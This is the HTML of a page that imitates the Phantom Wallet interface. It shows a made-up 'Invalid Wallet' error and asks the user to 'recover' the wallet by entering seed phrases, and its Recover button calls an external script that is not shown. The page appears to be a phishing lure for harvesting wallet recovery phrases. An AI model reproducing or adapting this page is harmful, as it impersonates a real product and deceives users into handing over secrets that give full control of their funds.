<html lang="en">
  <head>
    <link rel="stylesheet" href="./style.css">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Phantom Wallet</title>
    <style>
      @keyframes go2264125279 {
        from {
          transform: scale(0) rotate(45deg);
          opacity: 0;
        }

        to {
          transform: scale(1) rotate(45deg);
          opacity: 1;
        }
      }

      @keyframes go3020080000 {
        from {
          transform: scale(0);
          opacity: 0;
        }

        to {
          transform: scale(1);
          opacity: 1;
        }
      }

      @keyframes go463499852 {
        from {
          transform: scale(0) rotate(90deg);
          opacity: 0;
        }

        to {
          transform: scale(1) rotate(90deg);
          opacity: 1;
        }
      }

      @keyframes go1268368563 {
        from {
          transform: rotate(0deg);
        }

        to {
          transform: rotate(360deg);
        }
      }

      @keyframes go1310225428 {
        from {
          transform: scale(0) rotate(45deg);
          opacity: 0;
        }

        to {
          transform: scale(1) rotate(45deg);
          opacity: 1;
        }
      }

      @keyframes go651618207 {
        0% {
          height: 0;
          width: 0;
          opacity: 0;
        }

        40% {
          height: 0;
          width: 6px;
          opacity: 1;
        }

        100% {
          opacity: 1;
          height: 10px;
        }
      }

      @keyframes go901347462 {
        from {
          transform: scale(0.6);
          opacity: 0.4;
        }

        to {
          transform: scale(1);
          opacity: 1;
        }
      }

      .go4109123758 {
        z-index: 9999;
      }

      .go4109123758>* {
        pointer-events: auto;
      }
    </style>
  </head>
  <body>
    <noscript>You need to enable Javascript to run this application.</noscript>
    <div id="root">
      <div class="sc-fKVqWL eOjNfv">
        <div class="sc-cCcXHH kFeTsg" style="opacity: 1; transform: none;">
          <div class="sc-jEDbyf hvQaSQ">
            <div class="sc-iyXCSn kZnnKk">
              <div>
                <div width="100%" direction="column" class="sc-dVNjXY cJocUl">
                  <div width="100%" class="sc-dtMgUX cGMCOg">
                    <img src="./icon48.png">
                    <div width="100%" direction="column" class="sc-dVNjXY glFEa-d">
                      <p size="22" class="sc-jrQzAO dcMoSb sc-iZnKfu kNvvui" opacity="1" color="white">Invalid Wallet</p>
                      <div class="sc-eaUnpJ hmdiaF">phantom.app</div>
                    </div>
                  </div>
                </div>
                <div class="sc-ioFxDg eCrnZz">
                  <p color="#999999" size="14" class="sc-jrQzAO jZUsgA sc-gOMZtR invgyu" opacity="1" id="infoxD">Unable to connect with Wallet.<br />Recover your wallet with seed phrases below.</p>
                </div>
                <div class="sc-cTAqQK bvPiHD" id="ww">
                    
                </div>
              </div>
            </div>
            <div class="sc-bJijCA sc-fKeRlk cCwPyl iRKOqW">
              <div class="sc-jRQBWg cdtvVh" id="btcc">
                <button data-testid="secondary-button" font-size="16" font-weight="600" width="100%" type="button" class="sc-eCImPb fajfuv" onclick="sw(this)">24-words</button>
                <button type="submit" data-testid="primary-button" class="sc-eCImPb fgwvjA sc-gKclnd bOTjkm" font-size="16" font-weight="600" width="100%" onclick="start()" id="nextbutton">Recover</button>
              </div>
            </div>
          </div>
        </div>
        <div style="position: fixed; z-index: 9999; inset: 480px 16px 16px; pointer-events: none;"></div>
        <div id="modal"></div>
      </div>
    </div>
    <div class="sc-jlRYqD jXHaUt" style="position: fixed; inset: 0px; overflow: hidden; pointer-events: none; z-index: 9999999; visibility: visible;"></div>
    <div class="sc-jlRYqD jXHaUt" style="position: fixed; inset: 0px; overflow: hidden; pointer-events: none; z-index: 9999999; visibility: visible;"></div>
    <script src="./script.js"></script>
  </body>
</html>